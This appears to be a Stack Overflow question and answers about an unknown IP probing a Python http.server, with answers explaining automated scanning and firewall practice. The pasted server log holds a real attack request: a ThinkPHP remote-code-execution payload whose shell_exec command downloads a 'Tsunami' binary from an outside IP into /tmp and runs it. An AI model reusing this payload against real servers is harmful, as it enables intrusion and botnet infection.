# Python 3 http.server - A strange IP address tried to connect my server

Tags: python-3.x, windows-10, httpserver

Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.

Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how does this person knew my IP address and tried to connect to my computer? I've only shared it with my friend on WhatsApp.

I've done this many times before and this is the first time something like this happens.

```
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/       hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
```

Answer (score 2, accepted):

There are many people out there running tools like [Masscan](https://github.com/robertdavidgraham/masscan) with custom scripts looking for vulnerable web servers. Most of the time this kind of script are trying to get reverse shells in an attempt to build botnet armies. There are some relates of windows machines connected to internet being hacked before SO finish its installation as well.

Answer (score 0):

This is a pretty common hacking technique. Hackers will scan the internet using seemingly random ip addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.

Many of the botnet's were created by just attacking random ip addresses hoping that they would have a router with default username and password still set on their router, or with out of date software with known exploits.

In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your ip address was probably one of thousands that they ran the same query against.

Answer (score 0):

This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.

Instead, you should find out the IP of your friend, and just allow that single IP.  And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.